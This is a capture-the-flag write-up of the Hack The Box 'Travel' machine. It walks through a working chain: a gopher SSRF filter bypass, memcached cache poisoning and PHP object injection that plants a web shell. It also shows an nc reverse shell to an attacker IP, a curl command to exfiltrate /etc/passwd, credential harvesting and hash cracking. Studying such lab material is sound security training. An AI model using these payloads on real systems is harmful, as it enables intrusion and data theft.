In this write-up I will root the Travel machine hosted by Hack The Box. The machine is very realistic: it requires good enumeration as well as some custom exploitation.

It is a hard Linux-based box by xct and jkr, released on May 16, 2020.

This machine has been rooted in collaboration with my team member eightdot.

Reconnaissance

The IP address of the box is 10.10.10.189. Let's run a few Nmap scans.

nmap -p- -oA quick 10.10.10.189 &&
nmap -p- -A -oA full 10.10.10.189

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 21:33 CEST
Nmap scan report for travel.htb (10.10.10.189)
Host is up (0.018s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds

(...)

This quick scan reveals the machine appears to be a web server. Let's take a quick look at these pages. Navigating to http://10.10.10.189 shows us a countdown timer; apparently they plan to keep their website in development for over 2 years. Navigating to https://10.10.10.189 tells us they are still struggling with implementing multiple domains properly. This is where we learn there are multiple sites hosted on this machine. Let's inspect the certificate. The 'Certificate Subject Alt Name' reveals the following:

  • www.travel.htb
  • blog.travel.htb
  • blog-dev.travel.htb

Meanwhile, the full Nmap scan has completed. Let's examine the results.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 21:59 CEST
Nmap scan report for travel.htb (10.10.10.189)
Host is up (0.016s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.17.6
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB
443/tcp open  ssl/http nginx 1.17.6
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB - SSL coming soon.
| ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
| Not valid before: 2020-04-23T19:24:29
|_Not valid after:  2030-04-21T19:24:29
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.33 seconds

The full scan confirms my findings. To be able to browse to these websites, we need to add them to our hosts file.

sudo nano /etc/hosts

(...)
10.10.10.189    travel.htb
10.10.10.189    blog.travel.htb
10.10.10.189    blog-dev.travel.htb
10.10.10.189    www.travel.htb

A quick check with searchsploit gave no known vulnerabilities for these service versions. They are also pretty up to date, so I'll skip hunting for common vulnerabilities from other sources for now. Let's start a few quick Nikto scans for these websites in the background, then take a look at the websites in our browser.

nikto -host http://travel.htb -output nikto_travel_htb.txt &&
nikto -host http://blog.travel.htb -output nikto_blog_travel_htb.txt && 
nikto -host http://blog-dev.travel.htb -output nikto_blog_dev_travel_htb.txt

The www.travel.htb page is the same as the travel.htb page we have already seen. http://blog-dev.travel.htb returns a 403 Forbidden, and http://blog.travel.htb presents us with a WordPress blog. The first article mentions a fresh new RSS feature from their blog-dev team. Interesting! Let's focus on the blog for now while we wait for Nikto to complete.

Awesome RSS

When examining the sources of the blog page, I find the following:

/* I am really not sure how to include a custom CSS file
 * in worpress. I am including it directly via Additional CSS for now.
 * TODO: Fixme when copying from -dev to -prod. */

@import url(http://blog-dev.travel.htb/wp-content/uploads/2020/04/custom-css-version#01.css);

Obviously, this import won't work because of the # character. We do learn they copied this website over from their development environment. We also learn they forgot about the tasks on their TO-DO list :-). The URL still links to blog-dev instead of blog.

Let’s take a look at this Awesome RSS page they have mentioned.

When viewing the source, the following caught my eye. Apparently this page supports some sort of debug output.

<!--
DEBUG
-->

Let's make an educated guess and pass a debug parameter in the query string.

curl http://blog.travel.htb/awesome-rss/?debug
<!--
DEBUG
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
-->

Check. So some sort of debug information gets written here. I am not sure why it does not show anything at the moment. Meanwhile, the Nikto scans have completed.

A Git repository

For travel.htb nothing interesting was found. For blog.travel.htb it confirmed the WordPress installation. It also mentions robots.txt, which just contains the wp-admin folder.

blog-dev.travel.htb is where things get interesting. It appears they forgot to remove their .git folder from the development machine. Let's confirm by peeking at the HEAD, which also identifies the user jane.

+ OSVDB-3092: GET /.git/index: Git Index file may contain directory listing information.
+ GET /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ GET /.git/config: Git config file found. Infos about repo details may be present.
curl http://blog-dev.travel.htb/.git/logs/HEAD

0000000000000000000000000000000000000000 0313850ae948d71767aff2cc8cc0f87a0feeef63 jane <jane@travel.htb> 1587458094 -0700       commit (initial): moved to git

I run a wpscan in the background to take a look at the WordPress installation while we investigate the repository.

wpscan --url http://blog.travel.htb -e -o wpscan_blog

There is a popular tool set called GitTools that we can use to dump the Git repository to our local system. First we clone the sources from GitHub, then run the dumper to download the repository from the website, and finally use the extractor to recover all files found in the repository.

git clone https://github.com/internetwache/GitTools.git
./GitTools/Dumper/gitdumper.sh http://blog-dev.travel.htb/.git/ ./gitdump
./GitTools/Extractor/extractor.sh ./gitdump/ ./gitdump/
ls -R ./gitdump/

(...)
./gitdump/0-0313850ae948d71767aff2cc8cc0f87a0feeef63:
commit-meta.txt  README.md  rss_template.php  template.php

We have retrieved four files. Let's take a look at README.md.

# Rss Template Extension

Allows rss-feeds to be shown on a custom wordpress page.

## Setup

* `git clone https://github.com/WordPress/WordPress.git`
* copy rss_template.php & template.php to `wp-content/themes/twentytwenty` 
* create logs directory in `wp-content/themes/twentytwenty` 
* create page in backend and choose rss_template.php as theme

## Changelog

- temporarily disabled cache compression
- added additional security checks 
- added caching
- added rss template

## ToDo

- finish logging implementation

These appear to be the sources for their Awesome RSS page. We learn a few things here. First, the included .php files have been copied over to the twentytwenty theme folder. Second, there appears to be a logs directory. They also mention caching, with cache compression temporarily disabled. Finally, there is another to-do which has probably not been implemented. Let's check the logs folder to confirm. Unfortunately, curl http://blog.travel.htb/wp-content/themes/twentytwenty/logs gives us a 301 response.

Awesome RSS sources

We should take a look at those sources. As rss_template.php is the configured theme, I’ll start with that file.

// rss_template.php:5
include('template.php');

// rss_template.php:16
$simplepie = new SimplePie();
$simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');

// rss_template.php:34
$url = $_SERVER['QUERY_STRING'];
if(strpos($url, "custom_feed_url") !== false){
    $tmp = (explode("=", $url)); 	
    $url = end($tmp); 	
} else {
    $url = "http://www.travel.htb/newsfeed/customfeed.xml";
}

// rss_template.php:100
<!--
DEBUG
<?php
if (isset($_GET['debug'])){
  include('debug.php');
}
?>
-->

We learn a few interesting things here. They use the SimplePie library to load the feed http://www.travel.htb/newsfeed/customfeed.xml, and the URL can be overridden using the custom_feed_url query string parameter. They also use Memcached to cache feeds. Finally, we learn the debug output is served by another file called debug.php, which is not part of our Git commit. Using curl we confirm this is indeed the debug output.

curl http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
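Stepping back to the custom_feed_url handling: the PHP explode/end logic can be mimicked in Python to make its behaviour explicit. This is just a sketch; extract_feed_url is a hypothetical helper name, not part of the box's code.

```python
def extract_feed_url(query_string: str) -> str:
    # Mimic rss_template.php: if 'custom_feed_url' occurs anywhere in the raw
    # query string, the feed URL is everything after the LAST '=' character.
    if "custom_feed_url" in query_string:
        return query_string.split("=")[-1]
    # Otherwise fall back to the default feed.
    return "http://www.travel.htb/newsfeed/customfeed.xml"

print(extract_feed_url("debug&custom_feed_url=http://10.10.14.4:8000/a.xml"))
# http://10.10.14.4:8000/a.xml
```

Because the raw query string is used, the override survives untouched; note however that any '=' inside the supplied URL would truncate it.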

Let’s take a look at template.php

<?php

/**
 Todo: finish logging implementation via TemplateHelper
*/

function safe($url)
{
	// this should be secure
	$tmpUrl = urldecode($url);
	if(strpos($tmpUrl, "file://") !== false or strpos($tmpUrl, "@") !== false)
	{		
		die("<h2>Hacking attempt prevented (LFI). Event has been logged.</h2>");
	}
	if(strpos($tmpUrl, "-o") !== false or strpos($tmpUrl, "-F") !== false)
	{		
		die("<h2>Hacking attempt prevented (Command Injection). Event has been logged.</h2>");
	}
	$tmp = parse_url($url, PHP_URL_HOST);
	// preventing all localhost access
	if($tmp == "localhost" or $tmp == "127.0.0.1")
	{		
		die("<h2>Hacking attempt prevented (Internal SSRF). Event has been logged.</h2>");		
	}
	return $url;
}

function url_get_contents ($url) {
    $url = safe($url);
	$url = escapeshellarg($url);
	$pl = "curl ".$url;
	$output = shell_exec($pl);
    return $output;
}


class TemplateHelper
{

    private $file;
    private $data;

    public function __construct(string $file, string $data)
    {
    	$this->init($file, $data);
    }

    public function __wakeup()
    {
    	$this->init($this->file, $this->data);
    }

    private function init(string $file, string $data)
    {    	
        $this->file = $file;
        $this->data = $data;
        file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
    }
}

The safe function appears to be a simple Web Application Firewall (WAF) method. It tries to detect Local File Inclusion (LFI), command injection and Server-Side Request Forgery (SSRF).
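To see why this filter is weaker than it looks, here is a Python mimic of the safe() logic. This is a sketch, not the original code; note in particular that the decoded copy is only used for the checks, while the untouched URL is returned.

```python
from urllib.parse import unquote, urlparse

def safe(url: str) -> str:
    # Mimic template.php: the blacklist checks run against a DECODED copy...
    tmp_url = unquote(url)
    if "file://" in tmp_url or "@" in tmp_url:
        raise ValueError("LFI attempt blocked")
    if "-o" in tmp_url or "-F" in tmp_url:
        raise ValueError("command injection attempt blocked")
    # ...and the host check is an exact string comparison.
    if urlparse(url).hostname in ("localhost", "127.0.0.1"):
        raise ValueError("SSRF attempt blocked")
    # The ORIGINAL, unmodified url is what gets returned to the caller.
    return url

print(safe("http://www.travel.htb/newsfeed/customfeed.xml"))  # passes unchanged
```

An exact string match on the hostname leaves any alternative spelling of the loopback address unchecked, which will become relevant shortly.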

The url_get_contents function retrieves the feed using curl. This might be an interesting attack vector.

The TemplateHelper class appears to be unused. It is supposed to write data to the logs folder. The README.md mentioned logging is on their TO-DO list.

The __wakeup() method caught my attention. This is a method called when an object is deserialized by PHP. This is a bit odd for a Template Helper or logger class.

A few rabbit holes

I made a few attempts that turned out to be rabbit holes. First, I felt attacking curl was the way to go. I grabbed a simple Python script from the web that writes the body of POST requests to disk. Then I came up with the -X POST -T /etc/passwd http://10.10.14.32:8000/store.json command, which would exfiltrate local files with curl without being detected by the safe method. Unfortunately it did not work. I tried other files as well, like debug.php, without success.

I was a bit surprised it did not work. After examining the code a bit, I noticed the custom_feed_url value is passed directly to cURL without any decoding. The safe method does invoke $tmpUrl = urldecode($url);, however $tmpUrl is discarded as the code just returns the original $url.

However, rss_template.php:19 does pass the URL to SimplePie. Here I felt I could try LFI via XML External Entities (XXE). I wrote a valid RSS XML file that would include local files in the title of an item.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=debug.php" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:media="http://search.yahoo.com/mrss/">
<channel>
<item>
<title>&xxe;</title>
<link>http://blog.travel.htb/awesome-rss/</link>
<guid>http://blog.travel.htb/awesome-rss/</guid>
<pubDate>Mon, 30 Sep 2019 08:20:05 -0500</pubDate>
<description><![CDATA[This is just some blog entry]]></description>
<media:thumbnail xmlns:media="http://search.yahoo.com/mrss/"  url="http://ezinearticles.com/members/mem_pics/Tracey-A-Bell_1277621.jpg"  width="150"  height="150" />
</item>
</channel>
</rss>

Whether curl was vulnerable to this does not matter. After staring at an empty title for a while, I remembered the following lines:

// rss_template.php:18

//$simplepie->set_raw_data($data);
$simplepie->set_feed_url($url);

The curl data is being discarded; SimplePie itself is responsible for downloading the feed. Unfortunately, SimplePie is not vulnerable to this XXE attack.

Exploiting Memcache

After refreshing the blog page, I noticed the following in the debug output:

 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
| xct_4e5612ba07(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) |
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

This looks like trimmed data. On the left-hand side we find an xct_ prefix; on the right-hand side the first characters of what seems to be a PHP serialized object. Because SimplePie uses caching and they intend to do some sort of serialized logging using TemplateHelper, I suspect this is the cached feed. Let's confirm my suspicion. I restarted my local web server and hosted a valid RSS XML document.

Navigating to http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=http://10.10.14.4:8000/a.xml resulted in two requests the first time. However, the second time I only got one request.

python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.189 - - [23/May/2020 14:41:47] "GET /a.xml HTTP/1.1" 200 -
10.10.10.189 - - [23/May/2020 14:41:47] "GET /a.xml HTTP/1.1" 200 -
10.10.10.189 - - [23/May/2020 14:42:29] "GET /a.xml HTTP/1.1" 200 -

The first time, debug.php gave no output. The second time, it gave the following:

 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
| xct_39f94aaab0(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) |
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

I have confirmed debug.php shows the cached data. The first thing I noticed is that with my custom_feed_url override, the identifier has changed. So it looks like feeds are cached per feed URL. Let's try to find the full identifier.

echo "http://10.10.14.4:8000/a.xml" | md5sum
c1d91021748bc8a2d5f13fc29923396a  -

Unfortunately, the identifier is not a simple MD5 hash of the URL. WordPress and SimplePie are open-source software, and SimplePie is included in the sources of WordPress. So, let's take a look at the sources. The README.md shows the sources they have used for the blog.

Note: Because I refer to a lot of files and line numbers, you can use git checkout to view the same version I have used.

git clone https://github.com/WordPress/WordPress.git
git checkout b9751d4efeb03bfe9bd8f537b2d7524d24ffd7dc

Let’s take a look at /wp-includes/class-simplepie.php mentioned in rss_template.php first.

// /wp-includes/class-simplepie.php:6
require ABSPATH . WPINC . '/SimplePie/Cache.php';

// /wp-includes/class-simplepie.php:1157
public function set_cache_name_function($function = 'md5')
{
    // (...)
}

// /wp-includes/class-simplepie.php:1412
$cache = $this->registry->call('Cache', 'get_handler', array($this->cache_location, call_user_func($this->cache_name_function, $url), 'spc'));

// /wp-includes/SimplePie/Cache.php:65
'memcache'  => 'SimplePie_Cache_Memcache',

// /wp-includes/SimplePie/Cache/Memcache.php:99
$this->name = $this->options['extras']['prefix'] . md5("$name:$type");

When examining the files above, we learn that the cache identifier is xct_ followed by md5(md5($url) . ":spc"). Let's compare my identifier with the debug output.

echo -ne "http://10.10.14.4:8000/a.xml" | md5sum | awk '{printf "%s:spc", $1}'| md5sum
39f94aaab0184ded53c3b0a0e5168391  -

curl http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
| xct_39f94aaab0(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) |
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

So when browsing to http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=http://10.10.14.4:8000/a.xml we fetch data from the xct_39f94aaab0184ded53c3b0a0e5168391 record.
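The derivation can be double-checked with a short Python helper. This is a sketch with a hypothetical name cache_key; it reproduces SimplePie's double-MD5 scheme together with the xct_ prefix from rss_template.php.

```python
import hashlib

def cache_key(url: str, prefix: str = "xct_", ext: str = "spc") -> str:
    # SimplePie: name = md5(url), then the record key is prefix + md5("name:type")
    name = hashlib.md5(url.encode()).hexdigest()
    return prefix + hashlib.md5(f"{name}:{ext}".encode()).hexdigest()

print(cache_key("http://10.10.14.4:8000/a.xml"))
# xct_39f94aaab0184ded53c3b0a0e5168391
```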

We also know SimplePie uses PHP deserialization to read the cached data. This means we can use PHP Object Injection if we are able to inject our own serialized object into the cache.

Google’s first hit for ‘SSRF memcache’ is SSRF - Memcached and other key value injections in the wild where the author refers to his ‘The New Page of Injections Book: Memcached Injections’ presentation. This is a nice but optional read.

Building the exploit

The command that we want to execute sets a new value for the record identified by xct_39f94aaab0184ded53c3b0a0e5168391.

First we want to know whether we can write to the cache correctly. We will insert a test value and check whether it has been written to the cache by navigating to debug.php.

One can communicate with Memcached using a simple text protocol.

The command we want to run is:

set xct_39f94aaab0184ded53c3b0a0e5168391 0 0 4
test

Where ‘4’ represents the length of the payload (test) in bytes.
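The framing can also be generated programmatically, which avoids miscounting the byte length by hand. A sketch; memcached_set is a hypothetical helper name.

```python
def memcached_set(key: str, value: str, flags: int = 0, exptime: int = 0) -> str:
    # memcached text protocol: "set <key> <flags> <exptime> <bytes>" on one
    # line, the data block on the next; lines are terminated with \r\n.
    data = value.encode()
    return f"set {key} {flags} {exptime} {len(data)}\r\n{value}\r\n"

print(memcached_set("xct_39f94aaab0184ded53c3b0a0e5168391", "test"), end="")
```

The protocol specifies \r\n line endings, although in this exploit a bare \n turned out to be accepted as well.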

We only need to find a way to send simple text commands to this service.

The HackTricks GitBook has a nice topic on Server-Side Request Forgery (SSRF). When looking for a way to pass my command using cURL, I found the gopher:// scheme on their page.

Using this protocol you can specify the IP, port and bytes you want the listener to send. Then, you can basically exploit a SSRF to communicate with any TCP server

Gopher is documented in RFC 1436. Giving it a quick scan, it appears to be a simple text-based protocol indeed. Therefore, when using the gopher scheme, cURL will simply send our path as a command to Memcached.

However, we do need to bypass the safe method. It blocks our requests to 127.0.0.1, so we use its decimal notation: 2130706433.
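The decimal form of an IPv4 address is just its four bytes read as one big-endian integer, which a quick Python check confirms:

```python
import socket

def ip_to_decimal(ip: str) -> int:
    # Pack the dotted quad into 4 network-order bytes, read them as an integer.
    return int.from_bytes(socket.inet_aton(ip), "big")

print(ip_to_decimal("127.0.0.1"))  # 2130706433
```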

Second, we need to manually URL-encode the command. We cannot use cURL's --data-urlencode flag, because that would also encode gopher:// when it becomes part of the value of custom_feed_url.
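Encoding the command while leaving the scheme and host literal can be sketched with quote from Python's standard library:

```python
from urllib.parse import quote

identifier = "xct_39f94aaab0184ded53c3b0a0e5168391"
payload = "test"
command = f"set {identifier} 0 0 {len(payload)}\n{payload}"

# Percent-encode only the command; the gopher:// scheme and host stay literal.
url = "gopher://2130706433:11211/" + quote(command)
print(url)
```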

I will test whether cURL sends the command correctly by pointing it at localhost.

curl gopher://2130706433:11211/set%20xct_39f94aaab0184ded53c3b0a0e5168391%200%200%204%0Atest
nc -nvlp 11211
listening on [any] 11211 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 45148
et xct_39f94aaab0184ded53c3b0a0e5168391 0 0 4
test

As we can see, the first character is lost: cURL treats the first character of the Gopher selector as the item type and strips it. So, for the actual payload we'll prefix the command with a dummy 'a' character.

curl http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://2130706433:11211/aset%20xct_39f94aaab0184ded53c3b0a0e5168391%200%200%204%0Atest

Let's verify whether our test value has been written to the cache by taking a look at the debug.php page.

curl http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
| xct_39f94aaab0(...) | test |
 ~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

We confirmed we can write to the cache. Now we need to perform our PHP Object Injection.

The TemplateHelper class comes to the rescue. Basically, it writes some text to some file in the logs folder when being deserialized. I would like to write a shell.php file containing the following code, which allows us to do some remote code execution (RCE).

<?php
echo($_GET['cmd']);
system($_GET['cmd']);
?>

I serialized this into a TemplateHelper instance using this code:

<?php
class TemplateHelper
{
    // {...}
}

$identifier = "xct_39f94aaab0184ded53c3b0a0e5168391";
$filename = "shell.php";

// Create a new TemplateHelper instance loaded with our malicious code
$body = file_get_contents($filename);
$helper = new TemplateHelper($filename,$body);

// Serialize the instance
$helper_serialized = serialize($helper);
$helper_serialized_length = strlen($helper_serialized);

// Create an URL to inject our malicious code
$helper_serialized_urlencoded = urlencode($helper_serialized);
$request_url = "http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=gopher://2130706433:11211/aset%20"
    . $identifier
    . "%200%200%20"
    . (string)$helper_serialized_length
    . "%0d%0a"
    . $helper_serialized_urlencoded
    . "\r\n";

print($request_url);
?>

Let’s run this script using the PHP CLI to build our request URL.

php generate.php
http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=gopher://2130706433:11211/aset%20xct_39f94aaab0184ded53c3b0a0e5168391%200%200%20156%0d%0aO%3A14%3A%22TemplateHelper%22%3A2%3A%7Bs%3A20%3A%22%00TemplateHelper%00file%22%3Bs%3A9%3A%22shell.php%22%3Bs%3A20%3A%22%00TemplateHelper%00data%22%3Bs%3A50%3A%22%3C%3Fphp%0Aecho%28%24_GET%5B%27cmd%27%5D%29%3B%0Asystem%28%24_GET%5B%27cmd%27%5D%29%3B%0A%3F%3E%22%3B%7D
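For reference, the serialized string in this URL follows PHP's object serialization format, O:<len>:"Class":<nprops>:{...}, with private property names wrapped in NUL bytes together with the class name. A Python sketch that reproduces it (php_serialize_template_helper is a hypothetical name, not part of the exploit):

```python
def php_str(value: str) -> str:
    # A PHP serialized string: s:<byte length>:"<value>";
    return f's:{len(value.encode())}:"{value}";'

def php_serialize_template_helper(file: str, data: str) -> str:
    # Private properties serialize as "\0ClassName\0property".
    props = {
        "\x00TemplateHelper\x00file": file,
        "\x00TemplateHelper\x00data": data,
    }
    body = "".join(php_str(k) + php_str(v) for k, v in props.items())
    return f'O:14:"TemplateHelper":{len(props)}:{{{body}}}'

shell = "<?php\necho($_GET['cmd']);\nsystem($_GET['cmd']);\n?>"
print(php_serialize_template_helper("shell.php", shell))
```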

Running the exploit

First, we need to inject our code into the cache. To do this, navigate with your browser to the generated URL.

Second, we need to trigger the TemplateHelper by retrieving it from the cache and deserializing it. To do this, navigate to http://blog.travel.htb/awesome-rss/?debug&custom_feed_url=http://10.10.14.4:8000/a.xml. This will write our shell.php to the logs folder.


Third, let's run some commands. We have Remote Code Execution (RCE)!

curl -G --data-urlencode "cmd=cat /etc/passwd" http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

Let's try to get a fully interactive shell. I'll start with the basic NC solution. Do note the cache expires after 60 seconds, and there also appears to be a cleanup script that clears the logs folder.

Run the command nc 10.10.14.4 4444 -e /bin/sh after you have started your local NC listener as shown below.

curl -G --data-urlencode "cmd=nc 10.10.14.4 4444 -e /bin/sh" http://blog.travel.htb/wp-content/themes/twentytwenty/logs/shell.php

After a connection, upgrade your shell using script -qc /bin/bash /dev/null

nc -nvlp 4444
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.189] 57316
script -qc /bin/bash /dev/null
www-data@blog:/var/www/html/wp-content/themes/twentytwenty/logs$ 

Then use CTRL+Z to background the NC listener and run stty raw -echo. Then foreground the NC listener with fg. Finally run reset and provide xterm as terminal type. You will be presented with a new clean fully interactive shell.

www-data

So, we have a fully interactive shell as the www-data user. Let’s run our initial enumeration. On your attack machine, start a web server to host the Linux Smart Enumeration script.

wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh; chmod 700 lse.sh
python3 -m http.server

On the remote shell, navigate to a temp folder and start our enumeration script.

mkdir /tmp/.myrtle
cd /tmp/.myrtle
curl http://10.10.14.4:8000/lse.sh > lse.sh
chmod +x lse.sh
./lse.sh -l1

When reviewing the output, the following lines caught my attention:

[*] net000 Services listening only on localhost............................ yes!
---
tcp     LISTEN   0        80             127.0.0.1:3306           0.0.0.0:*     
tcp     LISTEN   0        1024           127.0.0.1:11211          0.0.0.0:*     
---
[!] fst190 Can we read any backup?......................................... yes!
---
-rw-r--r-- 1 root root 1190388 Apr 24 06:39 /opt/wordpress/backup-13-04-2020.sql
---
[*] ctn000 Are we in a docker container?................................... yes!

Apparently we are jailed inside a Docker container that runs Memcached as well as a database server.

First, let's fetch the database credentials from the WordPress configuration file to take a look at the current database.

www-data@blog:/var/www/html$ cat /var/www/html/wp-config.php
<?php
(...)
define( 'DB_NAME', 'wp' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'fiFtDDV9LYe8Ti' );
define( 'DB_HOST', '127.0.0.1' );
(...)

The Database

Let’s take a look at the present databases. It could be there is another database present.

mysql -u wp -p
Enter password: 
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wp                 |
+--------------------+

Just some default databases and the WordPress database are present. Let’s dive into wp.

MariaDB [(none)]> USE wp;
Database changed
MariaDB [wp]>

First, we should take a look at all the tables present.

MariaDB [wp]> SHOW TABLES;
+-----------------------+
| Tables_in_wp          |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+

Let’s take a look at wp_users. We might find some usernames. In addition, they may have reused their passwords. Using SHOW COLUMNS FROM wp_users; I was able to determine the columns I want to see.

MariaDB [wp]> SELECT user_login, user_pass FROM wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/ |
+------------+------------------------------------+

Using this same technique, I explored other interesting tables like wp_posts and wp_comments but found nothing interesting. You can exit the SQL shell using exit.

The Database backup

Let's take a look at the database backup. Our enumeration mentioned /opt/wordpress/backup-13-04-2020.sql. Let's take a manual look at the wp_users table first. I will be using cat and more to quickly find the insert statement we need, searching for the pattern wp_users VALUES.

cat /opt/wordpress/backup-13-04-2020.sql | more
/ `wp_users` VALUES
...skipping
INSERT INTO `wp_users` VALUES (1,'admin','$P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/','admin','admin@travel.htb','http://localhost','2020-04-13 13:19:01','',0,'admin'),(2,'lynik-admin','$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.','lynik-admin','lynik@travel.htb','','2020-04-13 13:36:18','',0,'Lynik Schmidt');

We now have an additional user: lynik-admin, with hash $P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc. (the trailing dot is part of the hash). It is noteworthy that this administrator user has since been removed from the live database.

If these passwords are supposed to be cracked, we should be able to find them in rockyou.txt.

echo "\$P\$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc." > hash

Let’s find the correct mode for hashcat using hashcat -h. I extracted the relevant lines for readability.

hashcat -h
hashcat - advanced password recovery

Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...

- [ Options ] -

 Options Short / Long           | Type | Description                                          | Example
================================+======+======================================================+=======================
 -m, --hash-type                | Num  | Hash-type, see references below                      | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3

- [ Hash modes ] -

      # | Name                                             | Category
  ======+==================================================+======================================
    400 | WordPress (MD5)                                  | Forums, CMS, E-Commerce, Frameworks


- [ Attack Modes ] -

  # | Mode
 ===+======
  0 | Straight

- [ Basic Examples ] -

  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict

Basically, the first example is exactly what we need.

hashcat -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
(...)
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser 
(...)

SSH credentials

We have found the user credentials lynik-admin:1stepcloser. Let's check whether we can get SSH access; that would be a great way to escape the Docker container.

